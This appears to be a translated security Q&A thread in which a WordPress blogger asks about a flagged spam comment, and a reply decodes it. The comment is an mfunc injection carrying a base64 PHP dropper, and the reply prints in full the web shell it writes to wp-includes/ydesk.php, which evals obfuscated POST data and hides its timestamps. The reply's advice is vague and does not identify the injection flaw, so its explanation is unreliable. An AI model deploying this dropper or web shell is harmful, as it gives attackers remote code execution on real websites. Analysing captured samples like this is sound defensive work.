Tentativo di hacking dei commenti di WordPress

1

Recentemente Akismet mi ha chiesto di moderare un possibile commento spam sul mio blog.

Era:

<!--mfunc eval(base64_decode("ICRmaWxlID0gZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pIC4gJy8nIC4gJ3dwLWluY2x1ZGVzL3lkZXNrLnBocCc7ICRzcmMgPSAnPD9waHAgZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgiRFpaSERxd0lFa1R2MHF2L3hRSW92RWE5d0h0WGVEWXR2UGVlMDA5ZElKWDVGQmtSeFpuMGY2cTNHY3MrMllzL2FiSVZPUHBmWG1SVFh2ejVSNGhqWWQwOGVldGNCRnIwcFFqb0FZekZtSXluVVhQMXR3QkRrTElWcDlrdStjN0d4NWx5RUYrQWZHbDQ2aG1CSjJkSmhkQW9ZY2dvQWNnb0VHQ2Q3MDROQmtaaDNKVDdVUnRmOVVMT1k2M29BTnBHZ0xhRXl4YUlqWXJVb2JMbkZ4clkwSlVCbEt1dFU3dndiQmJxTXBoZkhJSUVDb0tZKzZWdHVjOWZhTGhpWW9hYWlSUVovUHNPeXRKTUNyVXlXQ3lJbE9OckRYM1NQU0FZNkRCYStxZ2RiUTBoZGo5dk81bkVDOHhmV2ZyeDg3VXB2Tjc1WmdjcHNpNW9EVGxPVEtoRFdqVjdLZFFsOEREVWV1T3VMcTRReVViTGF4dnJ4aStqQXRJOGNXYWxOQTNtY0RrM2pVV25hV0VoanhhK0U1dmNRS2Z2dVBlOUNPWUxmZGdLS09KQ3kwWVFlV1lKZ2s4QXk0amxHMTh1UFlScmJFOGtNRnhVbEV5R2lMTU51WnhmQ2VyeW05cmV2VE5DbEw2eDByT2pac1c3Qi9PeHZ1Y1FCaU9QS0FnYXpGSXYwZEprbGIyNXdVSzV5NmF5SlZEMDhVNXVOaGhlNlBLV09oVlF3YWxSUGlCMGUyc2EvYWFtYndHRGM2bWJ4SDZtaUZUdVc4Y3NsRE5pZWhLMURGU0orTXU4bGFiSWZlNXFGeTNQOUFqYkpHb3hNQy8yQjRYbEpoQ3dObmdoOSthNnR5bEhubUFmSU1XTjRCYWdYUjJQcjNzSnJGUWQrUGU2ZHZYTE0wVVJBWElPMFR5ckl4MzJFYzFLUjJTaFVBQkdzbDFQS3hvNEh3dGNUYUdQK1IybWFHbnIrT05PaTdOQ0JhY1dYNkp3SkxYSEJCNXdtR05nMkswOHVIdjc0Sk9qUkRRL2RNbmpyZWVncCtLUmNBMmk5bmlreEVFNmxKYXk1WTBiSjdYTTdzSHNTSFg2OExiemVnbFdxeUxQS1NxTHpjUTR3VnFuS1FJRE91UndUZHZUTENPc2dhaENLZDdPOGtkbmVpU1pBcmt1aElETkN0S25Vc1FvU1NqMklxZXQxR0R3M3ExOHZHQ1pOQW1yU1Q5WUY0cVVwcHEwbEZWRGZRenV0em1PZEFwWDlLN09JcXJMQ09temkvUjlkVGpaWEtQSy9JNkN0SWlSVjhFL3B4NDJSNTFTYVJMSFpaUjVLVEdzbG5IcEdlVFJLeEpVR0U3TFBEWnhpeFlOb2lYcTJPc00yWmlkaVZWZ0hob29mclV6WXZRRDFzQ0J0OGdCWVFoOG9KWEt5d0h0VHd4cjJMTHE4dFM4bXhDQ014TmgyRm12WTJKMTBkYjBwV20wT2NPRkg0bjlNN0JHWHNVYXQ3VjR1QWlaVnZjeVpsNFIwaG9EQWNUbWlJZTFPVDl0dnNxcEswZ2dnSFNWSXhTSEhTalpmTzlDUXJycVJqOUgyYVg2NEFseWpENXgwZ0wyaUVBc1J6enJMVS9mYnE3ODM1bGExRlRjWUVZdzhrbUEyRmI4cWFla1dHTjdkMlJjeWExOGNzTW1scStPbFFCcE5DRkt5VGlmc0NHYVNlMzAxQ0M2VDJ6WWN2VVVHaFFUUFBsRm9TZFhxMDk3WE1MbktTVkxjNUJNK0wzQzhueGgvcFhLQ2YrQXhhaC9wbys3ZDRRUDJUNjlHeUxMa1lhUzhNUXhCK1QrazBmQ3J3d2VuVzJoZzdndGpOR2NnOFpIbmVWdmZvTm4vS1FMZVhnQ2RIeEdXa294bjFwcFRGZjFWUEdSRFF0ME5YVUEwb3FQaFJTZkpPT2lPWko0SkF6QWRzNnBHY3RnRWU2NkI1L2lqcUFEZVd2TGpIdWExeW53R1ZkRW8rbW1jYUFPU0pja1VqRUxJR1pPR24xMkNtc0ljVVVZVnVqSmF1MWx5Mk9ic3RseFA0M1dTUC81dUttUVdGRGswcG5WRTZkWWllbTVlb3kyaTZjSDlZUjdLMVpiMVdZTjFuUllpUjYxUXl6NVVXTm1VUXN5dThLV1FzUHdYK2I2VFUvVktBcFhmR0YxNzFYVUdpKzB2TTBPWmxqdkExUXFpKzE1cmY3eUllVFZyR1NYWjN0ZS9vZDJtOFJUNk5Cd2loejQ4RlpPVjN2Z2pMcDRLMkpxMGgxQW9Qd2IyOUVFV0h1V0cwVnExQzY1cTBRb1p2ZlI2Tm8yU1ljQklFcEFXZWppODRyNHRDdFI5cVpzamkyRXY1YVpYQVBRbGJlQ29FMEhjTCt0OUJJVnc2WmUzWlprc29aUWg2QzM0RTlZVVpxQXdBazQ1MW9NREIwcmRsQXRSWG9vcnhvR2RIUERHUTJYNWhFMmE1c2tjVkdNTHc3ZTRybngxTS9XZjRXdnZTZTA0VVFtNGpsMVJxVnNjSkpWdzQ3Q1FtR1RBdmc4cUhublRQSmVFWjgrQTk0eGxkNkZBZnhXUTRKY1dnL01oVWRQc2xPaTNxbnoycEljbU00NldTeEpPUHpoY2pzQVp6Ri9NNGxXOUc4MXlFTVRMZmlaaUNpejYwY3NNdHBYRmV1SCtMeUNVdHdYZVlrVkc5dStSMHI2Wm5GMjYzVm50WC9WVFFETTFndnY2cDFid3VBSUgwaUtoZmQrU0tXRDFZME5lWWlTNnBzNkJRb1FucEc3d1JQZ3c2cVdCS0JPZWRxdWFOVHRrMkYzRWRteWYwVzJ1bkw3UjBKRG9OakZZbmdTeDlybmtNa25vNkZyZEF3ZVpDYTJZZlNIS29BUzFvT0huZ1dUN2xpZ2NvZ2grR0lQb2JKS3FHZ1hmN2NEeTNIRnVDNGNidFZFOC9RSlhpTEZ6RVY4bEh1WVdlYlo2dWlqZ1hUNFE1bk8xMStzWHp3anlsVllMYUFCSnNvbEtKVEZVQlUza0Fxb3hrYmlkS2RsNVVNSkdWb2VtVVNzWkdLa0JCWDYvU1ZoMmVleXNubG9qTHR2NWhoSEtYRmJ6K3dDZzZZMmI4VHdsdFEzTkZmMkNtRWxtand4MXlhZ1lvN2IwVmhIOHZRRERxUUpSWnArU0U5ektBdGNsNll6Vkt5NFVMa2pweU5NMkhXK09HUTVJOGdOUWRKYUI1NVg1ZEtPM3d5WTNkK2VVZXZrVlNYQTl5K2NHWStXaW9CTnpGUHlBVktscnZOemx4dW5IekxQSnhmdHhISkpJd1hZZkpybnpSY1JFNFcxdVNhZDNvdlI3SnVIN2RnN2F6ZUJRWFF0ZnJtMmpXZVZMVW1TazNuUXovR1pjU3cxeE5IQzRoMHRYU29Za21XK3ZMWmxTRXBkbFRaU3RObGNZY2RUR2hpY0J2T2dGY1BEcWNFcTdvOXZuc20vbGlGZEtuQ0VNOERJOFdYaFV0d0lMb0tGUkc4NVF0Wjlodm9ISkRmRG1MYmIyekV3NFpabzdUWlRxckkwZEdZNUJKWVBXdE9jNVZnQlpwbXNnUDhaUlpocjZOc2xSdWhjbk03bW9nS3JkWnFOSWY3K1VMeDZzNVY2Q3oxSlJLWGx1eWZSMWdaZGN0QSswZ041M2RrZndSQ01uNXpBM3NzUzlOY3NiamFLKy9iR2VmdGtlQnhiY0VBTVVrNlk4Njg3WVdQYjh2NGxTWlVjdUx0blJEY2lqT1BIZitSNlBrODFjOG1LWEVQSWdKa3F3b2o1NklpZkNhYktlUS9Ed3R4NThIeklNbitHbS82aXhLa0NGeEdqd1FXR0ZndGhmc08wcnZSaW1xMTRMNEFQNG9OVW00MkUvdWlNQ2J5eXUxdHhPU3hadFh3U05Udk1PMWQxSnV6Q0hzVmRqd3I1MzRlazBERlNTZVFYa21OVk1oTE5NQjFycjc5S0NKSUFBSUlnVVlLWC91OC9mLy8rL2QvL0FRPT0iKSkpOyA/Pic7ICRtdGltZSA9IGZpbGVtdGltZShkaXJuYW1lKCRmaWxlKSk7ICRmaCA9IGZvcGVuKCRmaWxlLCAndycpOyBmd3JpdGUoJGZoLCAkc3JjKTsgZmNsb3NlKCRmaCk7IEB0b3VjaCgkZmlsZSwgJG10aW1lLCAkbXRpbWUpOyBAdG91Y2goZGlybmFtZSgkZmlsZSksICRtdGltZSwgJG10aW1lKTsgCg==")); --><!--/mfunc-->

Questo decodifica fino a $file = dirname($_SERVER['SCRIPT_FILENAME']) . '/' . 'wp-includes/ydesk.php'; $src = ''; $mtime = filemtime(dirname($file)); $fh = fopen($file, 'w'); fwrite($fh, $src); fclose($fh); @touch($file, $mtime, $mtime); @touch(dirname($file), $mtime, $mtime);

Ora non riesco a vedere cosa sta tentando di fare l'hacker qui. Qualcuno potrebbe spiegare cosa sta succedendo? Uno script ydesk.php non esiste.

    
posta Mastergalen 13.10.2013 - 14:09
fonte

1 risposta

2

Guardando il codice, credo che sia solo una parte di una sequenza di passaggi per eseguire il codice dannoso all'interno dei file del tema (ydesk.php) che stai utilizzando sul tuo sito.

Quindi assicurati che stai usando temi wordpress da fonti di terze parti, dai un'occhiata ai file per eventuali righe di codice sospette.

Se non utilizzi file di temi di terze parti, non dovresti preoccuparti.

Cheers!

<!--mfunc 
    $file = dirname($_SERVER['SCRIPT_FILENAME']) . '/' . 'wp-includes/ydesk.php'; $src = '<?php
    @error_reporting(0);
    @ini_set("display_errors", 0);
    @ini_set("log_errors", 0);
    @ini_set("error_log", 0);
    if (isset($_GET['r'])) {
        print $_GET['r'];
    } elseif (isset($_POST['e'])) {
        eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
    } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') {
        $data = file_get_contents('php://input');
        if (strlen($data) > 0)
            print 'STATUS-IMPORT-OK';
        if (strlen($data) > 12) {
            $fp = @fopen('tmpfile', 'a');
            @flock($fp, LOCK_EX);
            @fputs($fp, $_SERVER['REMOTE_ADDR'] . "\t" . base64_encode($data) . "\r\n");
            @flock($fp, LOCK_UN);
            @fclose($fp);
        }
    }
    ?>'; $mtime = filemtime(dirname($file)); $fh = fopen($file, 'w'); fwrite($fh, $src); fclose($fh); @touch($file, $mtime, $mtime); @touch(dirname($file), $mtime, $mtime); 
    exit;
    ; --><!--/mfunc-->
    
risposta data 17.10.2013 - 19:22
fonte

Leggi altre domande sui tag